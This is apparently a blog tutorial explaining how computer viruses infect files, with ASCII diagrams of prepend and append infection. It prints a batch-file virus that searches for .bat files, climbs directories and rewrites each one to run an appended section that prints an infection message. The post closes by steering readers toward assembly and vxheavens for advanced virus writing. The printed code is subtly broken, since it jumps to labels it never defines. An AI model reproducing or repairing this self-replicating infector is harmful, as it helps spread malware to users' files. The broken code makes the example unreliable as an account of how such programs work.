How a virus works

A few terms first

Virus – A computer virus is a program or code to be executed that appends and/or prepends itself (or parts of itself) to another program or file,
in most cases so that the virus gets executed before, during, or after the program gets executed. Other types of viruses overwrite files or
programs, to change the way the program functions or just to destroy data.

Infect – The act of a computer virus modifying another file.

Host file – The file that the virus infects or copies itself to.

End (A few terms first)

There are two basic ways of infecting a program with a virus (without destroying it).
One way is to prepend and append the file to have the virus transfer execution to the virus
section of the file at startup so that the original program does not get executed.

+------+  Infection  +-------+------+-------+
| FILE | ==========> | VIRUS | FILE | VIRUS |
+------+             +-------+------+-------+
                         |              ^
                         |              |

Another way is to prepend the virus to the beginning of the file so that the virus gets
executed first, and then the program.

+------+  Infection  +-------+------+
| FILE | ==========> | VIRUS | FILE |
+------+             +-------+------+

Here is an example virus (coded in .bat) that is meant to infect other batch files:

@echo off
for %%i in (*.bat) do call :infect %%i
cd ..
goto :dir
set host=%~1
type %host%>%host%.virbak
if errorlevel 1 exit
echo @echo off>%host%
echo goto virus-section>>%host%
echo :host-section>>%host%
echo @echo on>>%host%
type %host%.virbak>>%host%
del /f /q %host%.virbak
echo :virus-section>>%host%
echo echo This file is infected.>>%host%
echo echo.>>%host%
echo pause>>%host%
echo goto host-section>>%host%
goto :eof

The above batch file will search other batch files in the current folder while climbing directories. For each file it will backup the file first, then overwrite commands to jump to the virus part of the file, append the backed up file contents, and append the virus section at the end of the file which simply prints “This file is infected” and then gives control back to the original batch file.

The common functions that viruses use are file searching and file data modification. The simple virus infection routine goes like this:

    +--->| Search for files |
    |    +------------------+
    |             |
    |             V
    |      +-------------+       +------+
    |      | File Found? |--No-->| Exit |
    |      +-------------+       +------+
    |             |
    |            Yes
    |             |
    |             V
    |      +-------------+
    +------| Infect File |

Now there are many coding languages to create virus in. Most good virus writers recommend asm (Assembly Language) which is true.
Assembly language let’s you directly (or almost directly) code in machine language and use that to modify files, especially programs since
all programs are written to files in machine language that the original compiler converted the source code to. Going into detail with
Assembly language is beyond the scope of this article so I’ll leave that up to you to study.

Now there are many advanced virus strategies and techniques out there, if you want to really get into this I recommend going to
vxheavens or even to study and learn more.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: